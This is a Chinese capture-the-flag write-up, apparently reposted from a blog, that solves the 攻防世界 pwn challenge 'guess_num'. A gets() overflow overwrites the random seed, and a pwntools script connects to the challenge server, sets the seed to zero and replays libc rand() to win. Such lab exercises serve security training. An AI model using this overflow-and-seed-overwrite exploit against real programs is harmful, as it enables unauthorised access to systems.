【攻防世界pwn-guess_num】
作者:互联网
下载文件后,首先检查保护
开启了金丝雀,不能溢出到返回地址
将文件拖入ida阅读
代码逻辑是:首先输入name(赋值给v7),接着使用seed[0]作为种子生成10个随机数,每一轮都要猜对,10轮后进入sub_C3E()函数,我们进入这个函数后,发现是直接执行cat flag。
回头看main函数,发现v7和seed[0]都在栈上,且给v7赋值时使用的gets()方法
所以确定攻击思路:在输入name时,输入足够长的数据,覆盖seed[0],然后自己模拟C语言的rand()方法生成10个随机数,依次输入即可。随后开始编写脚本:
payload思路:用0x20的垃圾数据填充v7到seed[0]之间的空间,随后用p64(0)覆盖seed[0]的位置,表明此时读取seed[0],读出来的时0。然后用cdll运行C语言。
from pwn import *
from ctypes import *
io = remote("111.200.241.244",51836)
#用垃圾数据填充0x30到0x10之间的空间,接着用0覆盖seed
payload = b'a' * (0x30 - 0x10) + p64(0)
#发送payload,覆盖seed
io.recvuntil("Your name:")
io.sendline(payload)
#用python运行C语言,获取随机数
libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
libc.srand(0)
for i in range(10):
io.recvuntil("Please input your guess number:")
num = str(libc.rand() % 6 +1)
io.sendline(num)
io.interactive()
发送脚本,开始攻击:
标签:10,guess,libc,num,io,v7,pwn,seed,payload 来源: https://blog.csdn.net/a_silly_coder/article/details/122507574